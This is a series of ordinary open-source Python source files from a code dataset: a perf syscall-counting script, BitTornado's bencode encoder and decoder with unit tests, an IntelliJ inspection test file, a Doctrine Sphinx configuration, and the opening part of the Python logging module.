'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from perf_trace_context import *
from Core import *
from Util import *
usage = "perf script -s sctop.py [comm] [interval]\n"
for_comm = None
default_interval = 3
interval = default_interval
if len(sys.argv) > 3:
sys.exit(usage)
if len(sys.argv) > 2:
for_comm = sys.argv[1]
interval = int(sys.argv[2])
elif len(sys.argv) > 1:
try:
interval = int(sys.argv[1])
except ValueError:
for_comm = sys.argv[1]
interval = default_interval
syscalls = autodict()
def trace_begin():
thread.start_new_thread(print_syscall_totals, (interval,))
pass
def raw_syscalls__sys_enter(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
id, args):
if for_comm is not None:
if common_comm != for_comm:
return
try:
syscalls[id] += 1
except TypeError:
syscalls[id] = 1
def print_syscall_totals(interval):
while 1:
clear_term()
if for_comm is not None:
print "\nsyscall events for %s:\n\n" % (for_comm),
else:
print "\nsyscall events:\n\n",
print "%-40s %10s\n" % ("event", "count"),
print "%-40s %10s\n" % ("----------------------------------------", \
"----------"),
for id, val in sorted(syscalls.iteritems(), key = lambda(k, v): (v, k), \
reverse = True):
try:
print "%-40s %10d\n" % (syscall_name(id), val),
except TypeError:
pass
syscalls.clear()
time.sleep(interval)
|
lehoanganh/kcsdb
|
refs/heads/master
|
chef-repo/.chef/murder-kcsd/dist/BitTornado/bencode.py
|
17
|
# Written by Petru Paler, Uoti Urpala, Ross Cohen and John Hoffman
# see LICENSE.txt for license information
from types import IntType, LongType, StringType, ListType, TupleType, DictType
try:
from types import BooleanType
except ImportError:
BooleanType = None
try:
from types import UnicodeType
except ImportError:
UnicodeType = None
from cStringIO import StringIO
def decode_int(x, f):
f += 1
newf = x.index('e', f)
try:
n = int(x[f:newf])
except:
n = long(x[f:newf])
if x[f] == '-':
if x[f + 1] == '0':
raise ValueError
elif x[f] == '0' and newf != f+1:
raise ValueError
return (n, newf+1)
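# Worked example: decode_int('i-42e', 0) skips the leading 'i', parses the
# digits up to the terminating 'e', and returns (-42, 5), i.e. the decoded
# value plus the offset just past the 'e'.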
def decode_string(x, f):
colon = x.index(':', f)
try:
n = int(x[f:colon])
except (OverflowError, ValueError):
n = long(x[f:colon])
if x[f] == '0' and colon != f+1:
raise ValueError
colon += 1
return (x[colon:colon+n], colon+n)
def decode_unicode(x, f):
s, f = decode_string(x, f+1)
return (s.decode('UTF-8'),f)
def decode_list(x, f):
r, f = [], f+1
while x[f] != 'e':
v, f = decode_func[x[f]](x, f)
r.append(v)
return (r, f + 1)
def decode_dict(x, f):
r, f = {}, f+1
lastkey = None
while x[f] != 'e':
k, f = decode_string(x, f)
if lastkey >= k:
raise ValueError
lastkey = k
r[k], f = decode_func[x[f]](x, f)
return (r, f + 1)
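# Worked example: bdecode('d1:a0:1:b0:e') -> {'a': '', 'b': ''}; keys must
# arrive in strictly increasing order or the lastkey check above raises
# ValueError.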
decode_func = {}
decode_func['l'] = decode_list
decode_func['d'] = decode_dict
decode_func['i'] = decode_int
decode_func['0'] = decode_string
decode_func['1'] = decode_string
decode_func['2'] = decode_string
decode_func['3'] = decode_string
decode_func['4'] = decode_string
decode_func['5'] = decode_string
decode_func['6'] = decode_string
decode_func['7'] = decode_string
decode_func['8'] = decode_string
decode_func['9'] = decode_string
#decode_func['u'] = decode_unicode
def bdecode(x, sloppy = 0):
try:
r, l = decode_func[x[0]](x, 0)
# except (IndexError, KeyError):
except (IndexError, KeyError, ValueError):
raise ValueError, "bad bencoded data"
if not sloppy and l != len(x):
raise ValueError, "bad bencoded data"
return r
def test_bdecode():
try:
bdecode('0:0:')
assert 0
except ValueError:
pass
try:
bdecode('ie')
assert 0
except ValueError:
pass
try:
bdecode('i341foo382e')
assert 0
except ValueError:
pass
assert bdecode('i4e') == 4L
assert bdecode('i0e') == 0L
assert bdecode('i123456789e') == 123456789L
assert bdecode('i-10e') == -10L
try:
bdecode('i-0e')
assert 0
except ValueError:
pass
try:
bdecode('i123')
assert 0
except ValueError:
pass
try:
bdecode('')
assert 0
except ValueError:
pass
try:
bdecode('i6easd')
assert 0
except ValueError:
pass
try:
bdecode('35208734823ljdahflajhdf')
assert 0
except ValueError:
pass
try:
bdecode('2:abfdjslhfld')
assert 0
except ValueError:
pass
assert bdecode('0:') == ''
assert bdecode('3:abc') == 'abc'
assert bdecode('10:1234567890') == '1234567890'
try:
bdecode('02:xy')
assert 0
except ValueError:
pass
try:
bdecode('l')
assert 0
except ValueError:
pass
assert bdecode('le') == []
try:
bdecode('leanfdldjfh')
assert 0
except ValueError:
pass
assert bdecode('l0:0:0:e') == ['', '', '']
try:
bdecode('relwjhrlewjh')
assert 0
except ValueError:
pass
assert bdecode('li1ei2ei3ee') == [1, 2, 3]
assert bdecode('l3:asd2:xye') == ['asd', 'xy']
assert bdecode('ll5:Alice3:Bobeli2ei3eee') == [['Alice', 'Bob'], [2, 3]]
try:
bdecode('d')
assert 0
except ValueError:
pass
try:
bdecode('defoobar')
assert 0
except ValueError:
pass
assert bdecode('de') == {}
assert bdecode('d3:agei25e4:eyes4:bluee') == {'age': 25, 'eyes': 'blue'}
assert bdecode('d8:spam.mp3d6:author5:Alice6:lengthi100000eee') == {'spam.mp3': {'author': 'Alice', 'length': 100000}}
try:
bdecode('d3:fooe')
assert 0
except ValueError:
pass
try:
bdecode('di1e0:e')
assert 0
except ValueError:
pass
try:
bdecode('d1:b0:1:a0:e')
assert 0
except ValueError:
pass
try:
bdecode('d1:a0:1:a0:e')
assert 0
except ValueError:
pass
try:
bdecode('i03e')
assert 0
except ValueError:
pass
try:
bdecode('l01:ae')
assert 0
except ValueError:
pass
try:
bdecode('9999:x')
assert 0
except ValueError:
pass
try:
bdecode('l0:')
assert 0
except ValueError:
pass
try:
bdecode('d0:0:')
assert 0
except ValueError:
pass
try:
bdecode('d0:')
assert 0
except ValueError:
pass
bencached_marker = []
class Bencached:
def __init__(self, s):
self.marker = bencached_marker
self.bencoded = s
BencachedType = type(Bencached('')) # insufficient, but good as a filter
def encode_bencached(x,r):
assert x.marker == bencached_marker
r.append(x.bencoded)
def encode_int(x,r):
r.extend(('i',str(x),'e'))
def encode_bool(x,r):
encode_int(int(x),r)
def encode_string(x,r):
r.extend((str(len(x)),':',x))
def encode_unicode(x,r):
#r.append('u')
encode_string(x.encode('UTF-8'),r)
def encode_list(x,r):
r.append('l')
for e in x:
encode_func[type(e)](e, r)
r.append('e')
def encode_dict(x,r):
r.append('d')
ilist = x.items()
ilist.sort()
for k,v in ilist:
r.extend((str(len(k)),':',k))
encode_func[type(v)](v, r)
r.append('e')
encode_func = {}
encode_func[BencachedType] = encode_bencached
encode_func[IntType] = encode_int
encode_func[LongType] = encode_int
encode_func[StringType] = encode_string
encode_func[ListType] = encode_list
encode_func[TupleType] = encode_list
encode_func[DictType] = encode_dict
if BooleanType:
encode_func[BooleanType] = encode_bool
if UnicodeType:
encode_func[UnicodeType] = encode_unicode
def bencode(x):
r = []
try:
encode_func[type(x)](x, r)
except:
print "*** error *** could not encode type %s (value: %s)" % (type(x), x)
assert 0
return ''.join(r)
def test_bencode():
assert bencode(4) == 'i4e'
assert bencode(0) == 'i0e'
assert bencode(-10) == 'i-10e'
assert bencode(12345678901234567890L) == 'i12345678901234567890e'
assert bencode('') == '0:'
assert bencode('abc') == '3:abc'
assert bencode('1234567890') == '10:1234567890'
assert bencode([]) == 'le'
assert bencode([1, 2, 3]) == 'li1ei2ei3ee'
assert bencode([['Alice', 'Bob'], [2, 3]]) == 'll5:Alice3:Bobeli2ei3eee'
assert bencode({}) == 'de'
assert bencode({'age': 25, 'eyes': 'blue'}) == 'd3:agei25e4:eyes4:bluee'
assert bencode({'spam.mp3': {'author': 'Alice', 'length': 100000}}) == 'd8:spam.mp3d6:author5:Alice6:lengthi100000eee'
try:
bencode({1: 'foo'})
assert 0
except AssertionError:
pass
try:
import psyco
psyco.bind(bdecode)
psyco.bind(bencode)
except ImportError:
pass
|
siosio/intellij-community
|
refs/heads/master
|
python/testData/inspections/PyRedundantParenthesesInspection/While.py
|
83
|
while <weak_warning descr="Remove redundant parentheses">(True)</weak_warning>:
pass
|
sensukho/mgcommunity
|
refs/heads/master
|
vendor/doctrine/orm/docs/en/conf.py
|
2448
|
# -*- coding: utf-8 -*-
#
# Doctrine 2 ORM documentation build configuration file, created by
# sphinx-quickstart on Fri Dec 3 18:10:24 2010.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.append(os.path.abspath('_exts'))
# -- General configuration -----------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['configurationblock']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Doctrine 2 ORM'
copyright = u'2010-12, Doctrine Project Team'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '2'
# The full version, including alpha/beta/rc tags.
release = '2'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
language = 'en'
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of documents that shouldn't be included in the build.
#unused_docs = []
# List of directories, relative to source directory, that shouldn't be searched
# for source files.
exclude_trees = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
show_authors = True
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
html_theme = 'doctrine'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = ['_theme']
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_use_modindex = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = 'Doctrine2ORMdoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'Doctrine2ORM.tex', u'Doctrine 2 ORM Documentation',
u'Doctrine Project Team', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_use_modindex = True
primary_domain = "dcorm"
def linkcode_resolve(domain, info):
if domain == 'dcorm':
return 'http://'
return None
|
Zhongqilong/kbengine
|
refs/heads/master
|
kbe/res/scripts/common/Lib/logging/__init__.py
|
63
|
# Copyright 2001-2014 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""
Logging package for Python. Based on PEP 282 and comments thereto in
comp.lang.python.
Copyright (C) 2001-2014 Vinay Sajip. All Rights Reserved.
To use, simply 'import logging' and log away!
"""
import sys, os, time, io, traceback, warnings, weakref, collections
from string import Template
__all__ = ['BASIC_FORMAT', 'BufferingFormatter', 'CRITICAL', 'DEBUG', 'ERROR',
'FATAL', 'FileHandler', 'Filter', 'Formatter', 'Handler', 'INFO',
'LogRecord', 'Logger', 'LoggerAdapter', 'NOTSET', 'NullHandler',
'StreamHandler', 'WARN', 'WARNING', 'addLevelName', 'basicConfig',
'captureWarnings', 'critical', 'debug', 'disable', 'error',
'exception', 'fatal', 'getLevelName', 'getLogger', 'getLoggerClass',
'info', 'log', 'makeLogRecord', 'setLoggerClass', 'warn', 'warning',
'getLogRecordFactory', 'setLogRecordFactory', 'lastResort']
try:
import threading
except ImportError: #pragma: no cover
threading = None
__author__ = "Vinay Sajip <vinay_sajip@red-dove.com>"
__status__ = "production"
# The following module attributes are no longer updated.
__version__ = "0.5.1.2"
__date__ = "07 February 2010"
#---------------------------------------------------------------------------
# Miscellaneous module data
#---------------------------------------------------------------------------
#
#_startTime is used as the base when calculating the relative time of events
#
_startTime = time.time()
#
#raiseExceptions is used to see if exceptions during handling should be
#propagated
#
raiseExceptions = True
#
# If you don't want threading information in the log, set this to zero
#
logThreads = True
#
# If you don't want multiprocessing information in the log, set this to zero
#
logMultiprocessing = True
#
# If you don't want process information in the log, set this to zero
#
logProcesses = True
#---------------------------------------------------------------------------
# Level related stuff
#---------------------------------------------------------------------------
#
# Default levels and level names, these can be replaced with any positive set
# of values having corresponding names. There is a pseudo-level, NOTSET, which
# is only really there as a lower limit for user-defined levels. Handlers and
# loggers are initialized with NOTSET so that they will log all messages, even
# at user-defined levels.
#
CRITICAL = 50
FATAL = CRITICAL
ERROR = 40
WARNING = 30
WARN = WARNING
INFO = 20
DEBUG = 10
NOTSET = 0
_levelToName = {
CRITICAL: 'CRITICAL',
ERROR: 'ERROR',
WARNING: 'WARNING',
INFO: 'INFO',
DEBUG: 'DEBUG',
NOTSET: 'NOTSET',
}
_nameToLevel = {
'CRITICAL': CRITICAL,
'ERROR': ERROR,
'WARN': WARNING,
'WARNING': WARNING,
'INFO': INFO,
'DEBUG': DEBUG,
'NOTSET': NOTSET,
}
def getLevelName(level):
"""
Return the textual representation of logging level 'level'.
If the level is one of the predefined levels (CRITICAL, ERROR, WARNING,
INFO, DEBUG) then you get the corresponding string. If you have
associated levels with names using addLevelName then the name you have
associated with 'level' is returned.
If a numeric value corresponding to one of the defined levels is passed
in, the corresponding string representation is returned.
Otherwise, the string "Level %s" % level is returned.
"""
# See Issue #22386 for the reason for this convoluted expression
return _levelToName.get(level, _nameToLevel.get(level, ("Level %s" % level)))
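# e.g. getLevelName(20) -> 'INFO', getLevelName('INFO') -> 20 (reverse
# lookup), and getLevelName(15) -> 'Level 15' when no name is registered.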
def addLevelName(level, levelName):
"""
Associate 'levelName' with 'level'.
This is used when converting levels to text during message formatting.
"""
_acquireLock()
try: #unlikely to cause an exception, but you never know...
_levelToName[level] = levelName
_nameToLevel[levelName] = level
finally:
_releaseLock()
if hasattr(sys, '_getframe'):
currentframe = lambda: sys._getframe(3)
else: #pragma: no cover
def currentframe():
"""Return the frame object for the caller's stack frame."""
try:
raise Exception
except Exception:
return sys.exc_info()[2].tb_frame.f_back
#
# _srcfile is used when walking the stack to check when we've got the first
# caller stack frame, by skipping frames whose filename is that of this
# module's source. It therefore should contain the filename of this module's
# source file.
#
# Ordinarily we would use __file__ for this, but frozen modules don't always
# have __file__ set, for some reason (see Issue #21736). Thus, we get the
# filename from a handy code object from a function defined in this module.
# (There's no particular reason for picking addLevelName.)
#
_srcfile = os.path.normcase(addLevelName.__code__.co_filename)
# _srcfile is only used in conjunction with sys._getframe().
# To provide compatibility with older versions of Python, set _srcfile
# to None if _getframe() is not available; this value will prevent
# findCaller() from being called. You can also do this if you want to avoid
# the overhead of fetching caller information, even when _getframe() is
# available.
#if not hasattr(sys, '_getframe'):
# _srcfile = None
def _checkLevel(level):
if isinstance(level, int):
rv = level
elif str(level) == level:
if level not in _nameToLevel:
raise ValueError("Unknown level: %r" % level)
rv = _nameToLevel[level]
else:
raise TypeError("Level not an integer or a valid string: %r" % level)
return rv
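# e.g. _checkLevel(30) -> 30 and _checkLevel('WARNING') -> 30, while
# _checkLevel('warning') raises ValueError: the _nameToLevel lookup is
# case sensitive.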
#---------------------------------------------------------------------------
# Thread-related stuff
#---------------------------------------------------------------------------
#
#_lock is used to serialize access to shared data structures in this module.
#This needs to be an RLock because fileConfig() creates and configures
#Handlers, and so might arbitrary user threads. Since Handler code updates the
#shared dictionary _handlers, it needs to acquire the lock. But if configuring,
#the lock would already have been acquired - so we need an RLock.
#The same argument applies to Loggers and Manager.loggerDict.
#
if threading:
_lock = threading.RLock()
else: #pragma: no cover
_lock = None
def _acquireLock():
"""
Acquire the module-level lock for serializing access to shared data.
This should be released with _releaseLock().
"""
if _lock:
_lock.acquire()
def _releaseLock():
"""
Release the module-level lock acquired by calling _acquireLock().
"""
if _lock:
_lock.release()
#---------------------------------------------------------------------------
# The logging record
#---------------------------------------------------------------------------
class LogRecord(object):
"""
A LogRecord instance represents an event being logged.
LogRecord instances are created every time something is logged. They
contain all the information pertinent to the event being logged. The
main information passed in is in msg and args, which are combined
using str(msg) % args to create the message field of the record. The
record also includes information such as when the record was created,
the source line where the logging call was made, and any exception
information to be logged.
"""
def __init__(self, name, level, pathname, lineno,
msg, args, exc_info, func=None, sinfo=None, **kwargs):
"""
Initialize a logging record with interesting information.
"""
ct = time.time()
self.name = name
self.msg = msg
#
# The following statement allows passing of a dictionary as a sole
# argument, so that you can do something like
# logging.debug("a %(a)d b %(b)s", {'a':1, 'b':2})
# Suggested by Stefan Behnel.
# Note that without the test for args[0], we get a problem because
# during formatting, we test to see if the arg is present using
# 'if self.args:'. If the event being logged is e.g. 'Value is %d'
# and if the passed arg fails 'if self.args:' then no formatting
# is done. For example, logger.warning('Value is %d', 0) would log
# 'Value is %d' instead of 'Value is 0'.
# For the use case of passing a dictionary, this should not be a
# problem.
# Issue #21172: a request was made to relax the isinstance check
# to hasattr(args[0], '__getitem__'). However, the docs on string
# formatting still seem to suggest a mapping object is required.
# Thus, while not removing the isinstance check, it does now look
# for collections.Mapping rather than, as before, dict.
if (args and len(args) == 1 and isinstance(args[0], collections.Mapping)
and args[0]):
args = args[0]
self.args = args
self.levelname = getLevelName(level)
self.levelno = level
self.pathname = pathname
try:
self.filename = os.path.basename(pathname)
self.module = os.path.splitext(self.filename)[0]
except (TypeError, ValueError, AttributeError):
self.filename = pathname
self.module = "Unknown module"
self.exc_info = exc_info
self.exc_text = None # used to cache the traceback text
self.stack_info = sinfo
self.lineno = lineno
self.funcName = func
self.created = ct
self.msecs = (ct - int(ct)) * 1000
self.relativeCreated = (self.created - _startTime) * 1000
if logThreads and threading:
self.thread = threading.get_ident()
self.threadName = threading.current_thread().name
else: # pragma: no cover
self.thread = None
self.threadName = None
if not logMultiprocessing: # pragma: no cover
self.processName = None
else:
self.processName = 'MainProcess'
mp = sys.modules.get('multiprocessing')
if mp is not None:
# Errors may occur if multiprocessing has not finished loading
# yet - e.g. if a custom import hook causes third-party code
# to run when multiprocessing calls import. See issue 8200
# for an example
try:
self.processName = mp.current_process().name
except Exception: #pragma: no cover
pass
if logProcesses and hasattr(os, 'getpid'):
self.process = os.getpid()
else:
self.process = None
def __str__(self):
return '<LogRecord: %s, %s, %s, %s, "%s">'%(self.name, self.levelno,
self.pathname, self.lineno, self.msg)
def getMessage(self):
"""
Return the message for this LogRecord.
Return the message for this LogRecord after merging any user-supplied
arguments with the message.
"""
msg = str(self.msg)
if self.args:
msg = msg % self.args
return msg
#
# Determine which class to use when instantiating log records.
#
_logRecordFactory = LogRecord
def setLogRecordFactory(factory):
"""
Set the factory to be used when instantiating a log record.
:param factory: A callable which will be called to instantiate
a log record.
"""
global _logRecordFactory
_logRecordFactory = factory
def getLogRecordFactory():
"""
Return the factory to be used when instantiating a log record.
"""
return _logRecordFactory
def makeLogRecord(dict):
"""
    Make a LogRecord whose attributes are defined by the specified dictionary.
This function is useful for converting a logging event received over
a socket connection (which is sent as a dictionary) into a LogRecord
instance.
"""
rv = _logRecordFactory(None, None, "", 0, "", (), None, None)
rv.__dict__.update(dict)
return rv
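# Illustrative sketch (not part of the original module): makeLogRecord() is
# typically fed a dict that was serialized on the sending side, e.g. by a
# socket-based handler. A minimal round trip looks like this:
#
#   rec = LogRecord('demo', INFO, __file__, 1, 'hello %s', ('world',), None)
#   wire = rec.__dict__              # roughly what a socket receiver unpickles
#   clone = makeLogRecord(wire)
#   assert clone.getMessage() == 'hello world'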
#---------------------------------------------------------------------------
# Formatter classes and functions
#---------------------------------------------------------------------------
class PercentStyle(object):
default_format = '%(message)s'
asctime_format = '%(asctime)s'
asctime_search = '%(asctime)'
def __init__(self, fmt):
self._fmt = fmt or self.default_format
def usesTime(self):
return self._fmt.find(self.asctime_search) >= 0
def format(self, record):
return self._fmt % record.__dict__
class StrFormatStyle(PercentStyle):
default_format = '{message}'
asctime_format = '{asctime}'
asctime_search = '{asctime'
def format(self, record):
return self._fmt.format(**record.__dict__)
class StringTemplateStyle(PercentStyle):
default_format = '${message}'
asctime_format = '${asctime}'
asctime_search = '${asctime}'
def __init__(self, fmt):
self._fmt = fmt or self.default_format
self._tpl = Template(self._fmt)
def usesTime(self):
fmt = self._fmt
return fmt.find('$asctime') >= 0 or fmt.find(self.asctime_format) >= 0
def format(self, record):
return self._tpl.substitute(**record.__dict__)
BASIC_FORMAT = "%(levelname)s:%(name)s:%(message)s"
_STYLES = {
'%': (PercentStyle, BASIC_FORMAT),
'{': (StrFormatStyle, '{levelname}:{name}:{message}'),
'$': (StringTemplateStyle, '${levelname}:${name}:${message}'),
}
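# Illustrative sketch (not part of the original module): the three style
# classes all format the same record attributes; only the placeholder
# syntax differs:
#
#   rec = makeLogRecord({'message': 'disk full', 'levelname': 'ERROR'})
#   PercentStyle('%(levelname)s %(message)s').format(rec)   # 'ERROR disk full'
#   StrFormatStyle('{levelname} {message}').format(rec)     # 'ERROR disk full'
#   StringTemplateStyle('$levelname $message').format(rec)  # 'ERROR disk full'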
class Formatter(object):
"""
Formatter instances are used to convert a LogRecord to text.
Formatters need to know how a LogRecord is constructed. They are
responsible for converting a LogRecord to (usually) a string which can
be interpreted by either a human or an external system. The base Formatter
allows a formatting string to be specified. If none is supplied, the
    default value of "%(message)s" is used.
The Formatter can be initialized with a format string which makes use of
knowledge of the LogRecord attributes - e.g. the default value mentioned
above makes use of the fact that the user's message and arguments are pre-
formatted into a LogRecord's message attribute. Currently, the useful
attributes in a LogRecord are described by:
%(name)s Name of the logger (logging channel)
%(levelno)s Numeric logging level for the message (DEBUG, INFO,
WARNING, ERROR, CRITICAL)
%(levelname)s Text logging level for the message ("DEBUG", "INFO",
"WARNING", "ERROR", "CRITICAL")
%(pathname)s Full pathname of the source file where the logging
call was issued (if available)
%(filename)s Filename portion of pathname
%(module)s Module (name portion of filename)
%(lineno)d Source line number where the logging call was issued
(if available)
%(funcName)s Function name
%(created)f Time when the LogRecord was created (time.time()
return value)
%(asctime)s Textual time when the LogRecord was created
%(msecs)d Millisecond portion of the creation time
%(relativeCreated)d Time in milliseconds when the LogRecord was created,
relative to the time the logging module was loaded
(typically at application startup time)
%(thread)d Thread ID (if available)
%(threadName)s Thread name (if available)
%(process)d Process ID (if available)
%(message)s The result of record.getMessage(), computed just as
the record is emitted
"""
converter = time.localtime
def __init__(self, fmt=None, datefmt=None, style='%'):
"""
Initialize the formatter with specified format strings.
Initialize the formatter either with the specified format string, or a
default as described above. Allow for specialized date formatting with
the optional datefmt argument (if omitted, you get the ISO8601 format).
Use a style parameter of '%', '{' or '$' to specify that you want to
use one of %-formatting, :meth:`str.format` (``{}``) formatting or
:class:`string.Template` formatting in your format string.
        .. versionchanged:: 3.2
Added the ``style`` parameter.
"""
if style not in _STYLES:
raise ValueError('Style must be one of: %s' % ','.join(
_STYLES.keys()))
self._style = _STYLES[style][0](fmt)
self._fmt = self._style._fmt
self.datefmt = datefmt
default_time_format = '%Y-%m-%d %H:%M:%S'
default_msec_format = '%s,%03d'
def formatTime(self, record, datefmt=None):
"""
Return the creation time of the specified LogRecord as formatted text.
This method should be called from format() by a formatter which
wants to make use of a formatted time. This method can be overridden
in formatters to provide for any specific requirement, but the
basic behaviour is as follows: if datefmt (a string) is specified,
it is used with time.strftime() to format the creation time of the
record. Otherwise, the ISO8601 format is used. The resulting
string is returned. This function uses a user-configurable function
to convert the creation time to a tuple. By default, time.localtime()
is used; to change this for a particular formatter instance, set the
'converter' attribute to a function with the same signature as
time.localtime() or time.gmtime(). To change it for all formatters,
for example if you want all logging times to be shown in GMT,
set the 'converter' attribute in the Formatter class.
"""
ct = self.converter(record.created)
if datefmt:
s = time.strftime(datefmt, ct)
else:
t = time.strftime(self.default_time_format, ct)
s = self.default_msec_format % (t, record.msecs)
return s
def formatException(self, ei):
"""
Format and return the specified exception information as a string.
This default implementation just uses
traceback.print_exception()
"""
sio = io.StringIO()
tb = ei[2]
# See issues #9427, #1553375. Commented out for now.
#if getattr(self, 'fullstack', False):
# traceback.print_stack(tb.tb_frame.f_back, file=sio)
traceback.print_exception(ei[0], ei[1], tb, None, sio)
s = sio.getvalue()
sio.close()
if s[-1:] == "\n":
s = s[:-1]
return s
def usesTime(self):
"""
Check if the format uses the creation time of the record.
"""
return self._style.usesTime()
def formatMessage(self, record):
return self._style.format(record)
def formatStack(self, stack_info):
"""
This method is provided as an extension point for specialized
formatting of stack information.
The input data is a string as returned from a call to
:func:`traceback.print_stack`, but with the last trailing newline
removed.
The base implementation just returns the value passed in.
"""
return stack_info
def format(self, record):
"""
Format the specified record as text.
The record's attribute dictionary is used as the operand to a
string formatting operation which yields the returned string.
Before formatting the dictionary, a couple of preparatory steps
are carried out. The message attribute of the record is computed
using LogRecord.getMessage(). If the formatting string uses the
time (as determined by a call to usesTime(), formatTime() is
called to format the event time. If there is exception information,
it is formatted using formatException() and appended to the message.
"""
record.message = record.getMessage()
if self.usesTime():
record.asctime = self.formatTime(record, self.datefmt)
s = self.formatMessage(record)
if record.exc_info:
# Cache the traceback text to avoid converting it multiple times
# (it's constant anyway)
if not record.exc_text:
record.exc_text = self.formatException(record.exc_info)
if record.exc_text:
if s[-1:] != "\n":
s = s + "\n"
s = s + record.exc_text
if record.stack_info:
if s[-1:] != "\n":
s = s + "\n"
s = s + self.formatStack(record.stack_info)
return s
#
# The default formatter to use when no other is specified
#
_defaultFormatter = Formatter()
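# Illustrative sketch (not part of the original module): a Formatter wired
# with an explicit date format; formatTime() is only invoked because the
# format string contains %(asctime)s (see usesTime()):
#
#   fmt = Formatter('%(asctime)s %(name)s: %(message)s',
#                   datefmt='%Y-%m-%dT%H:%M:%S')
#   rec = LogRecord('demo', WARNING, __file__, 1, 'low disk', (), None)
#   fmt.format(rec)   # e.g. '2016-01-01T12:00:00 demo: low disk'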
class BufferingFormatter(object):
"""
A formatter suitable for formatting a number of records.
"""
def __init__(self, linefmt=None):
"""
Optionally specify a formatter which will be used to format each
individual record.
"""
if linefmt:
self.linefmt = linefmt
else:
self.linefmt = _defaultFormatter
def formatHeader(self, records):
"""
Return the header string for the specified records.
"""
return ""
def formatFooter(self, records):
"""
Return the footer string for the specified records.
"""
return ""
def format(self, records):
"""
Format the specified records and return the result as a string.
"""
rv = ""
if len(records) > 0:
rv = rv + self.formatHeader(records)
for record in records:
rv = rv + self.linefmt.format(record)
rv = rv + self.formatFooter(records)
return rv
#---------------------------------------------------------------------------
# Filter classes and functions
#---------------------------------------------------------------------------
class Filter(object):
"""
Filter instances are used to perform arbitrary filtering of LogRecords.
Loggers and Handlers can optionally use Filter instances to filter
